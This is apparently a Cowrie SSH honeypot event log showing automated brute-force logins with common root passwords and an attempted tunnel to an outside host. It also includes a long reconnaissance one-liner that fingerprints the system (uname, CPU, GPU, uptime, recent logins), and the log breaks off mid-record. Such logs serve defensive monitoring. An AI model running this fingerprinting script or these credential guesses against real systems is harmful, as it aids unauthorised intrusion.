{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":8879,"dst_ip":"1.2.3.4","dst_port":22,"session":"107236b631d4","protocol":"ssh","message":"New connection: 212.227.125.160:8879 (1.2.3.4:22) [session: 107236b631d4]","sensor":"my-vps","timestamp":"2025-08-28T08:52:48.466217Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:52:48.467227Z","src_ip":"212.227.125.160","session":"107236b631d4"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T08:52:48.578691Z","src_ip":"212.227.125.160","session":"107236b631d4"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:52:48.915317Z","src_ip":"212.227.125.160","session":"107236b631d4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T08:52:49.027666Z","session":"107236b631d4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:52:51.371174Z","src_ip":"212.227.235.229","session":"966cc20cec85"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-28T08:52:51.371878Z","src_ip":"212.227.235.229","session":"966cc20cec85"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:52:51.372739Z","src_ip":"212.227.235.229","session":"966cc20cec85"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:52:51.373822Z","src_ip":"212.227.235.229","session":"966cc20cec85"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-28T08:52:51.375143Z","src_ip":"212.227.235.229","session":"966cc20cec85"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T08:52:51.375845Z","src_ip":"212.227.235.229","session":"966cc20cec85"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T08:52:51.376557Z","src_ip":"212.227.235.229","session":"966cc20cec85"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-28T08:52:51.377828Z","src_ip":"212.227.235.229","session":"966cc20cec85"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-28T08:52:51.378316Z","src_ip":"212.227.235.229","session":"966cc20cec85"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T08:52:51.378845Z","src_ip":"212.227.235.229","session":"966cc20cec85"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T08:52:51.379449Z","src_ip":"212.227.235.229","session":"966cc20cec85"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T08:52:51.380176Z","src_ip":"212.227.235.229","session":"966cc20cec85"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T08:52:51.380531Z","src_ip":"212.227.235.229","session":"966cc20cec85"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-28T08:52:53.429028Z","src_ip":"212.227.235.229","session":"966cc20cec85"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"2.1","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:52:53.429887Z","src_ip":"212.227.235.229","session":"966cc20cec85"}
{"eventid":"cowrie.session.closed","duration":"15.2","message":"Connection lost after 15.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:52:53.430859Z","src_ip":"212.227.235.229","session":"966cc20cec85"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":54912,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ef78e193912","protocol":"ssh","message":"New connection: 51.79.164.132:54912 (1.2.3.4:22) [session: 9ef78e193912]","sensor":"my-vps","timestamp":"2025-08-28T08:52:59.714997Z"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":45598,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1eaa1e9cb47","protocol":"ssh","message":"New connection: 185.93.89.7:45598 (1.2.3.4:22) [session: c1eaa1e9cb47]","sensor":"my-vps","timestamp":"2025-08-28T08:53:00.123827Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:53:00.149280Z","src_ip":"51.79.164.132","session":"9ef78e193912"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:53:00.150028Z","src_ip":"51.79.164.132","session":"9ef78e193912"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:53:00.179321Z","src_ip":"185.93.89.7","session":"c1eaa1e9cb47"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:53:00.180063Z","src_ip":"185.93.89.7","session":"c1eaa1e9cb47"}
{"eventid":"cowrie.login.success","username":"root","password":"index2024","message":"login attempt [root/index2024] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:53:00.371674Z","src_ip":"185.93.89.7","session":"c1eaa1e9cb47"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:53:00.418625Z","src_ip":"185.93.89.7","session":"c1eaa1e9cb47"}
{"eventid":"cowrie.login.failed","username":"gpadmin","password":"gpadmin","message":"login attempt [gpadmin/gpadmin] failed","sensor":"my-vps","timestamp":"2025-08-28T08:53:05.079796Z","src_ip":"51.79.164.132","session":"9ef78e193912"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:53:07.242605Z","src_ip":"51.79.164.132","session":"9ef78e193912"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":45708,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7726e46aa5c","protocol":"ssh","message":"New connection: 185.93.89.7:45708 (1.2.3.4:22) [session: d7726e46aa5c]","sensor":"my-vps","timestamp":"2025-08-28T08:53:08.972983Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:53:08.973983Z","src_ip":"185.93.89.7","session":"d7726e46aa5c"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:53:08.992572Z","src_ip":"185.93.89.7","session":"d7726e46aa5c"}
{"eventid":"cowrie.login.success","username":"root","password":"Index2024","message":"login attempt [root/Index2024] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:53:09.031389Z","src_ip":"185.93.89.7","session":"d7726e46aa5c"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:53:09.051459Z","src_ip":"185.93.89.7","session":"d7726e46aa5c"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":50028,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb72e84c317a","protocol":"ssh","message":"New connection: 51.79.164.132:50028 (1.2.3.4:22) [session: eb72e84c317a]","sensor":"my-vps","timestamp":"2025-08-28T08:53:26.454037Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:53:27.140224Z","src_ip":"51.79.164.132","session":"eb72e84c317a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:53:27.140959Z","src_ip":"51.79.164.132","session":"eb72e84c317a"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"qwe123","message":"login attempt [oracle/qwe123] failed","sensor":"my-vps","timestamp":"2025-08-28T08:53:30.668784Z","src_ip":"51.79.164.132","session":"eb72e84c317a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60924,"dst_ip":"1.2.3.4","dst_port":22,"session":"c41090be2d63","protocol":"ssh","message":"New connection: 212.227.125.160:60924 (1.2.3.4:22) [session: c41090be2d63]","sensor":"my-vps","timestamp":"2025-08-28T08:53:31.478024Z"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:53:32.438353Z","src_ip":"51.79.164.132","session":"eb72e84c317a"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:53:32.781040Z","src_ip":"212.227.125.160","session":"c41090be2d63"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T08:53:32.781778Z","src_ip":"212.227.125.160","session":"c41090be2d63"}
{"eventid":"cowrie.login.success","username":"root","password":"1q2w3e4r","message":"login attempt [root/1q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:53:39.101502Z","src_ip":"212.227.125.160","session":"c41090be2d63"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:53:42.864099Z","src_ip":"212.227.125.160","session":"c41090be2d63"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk 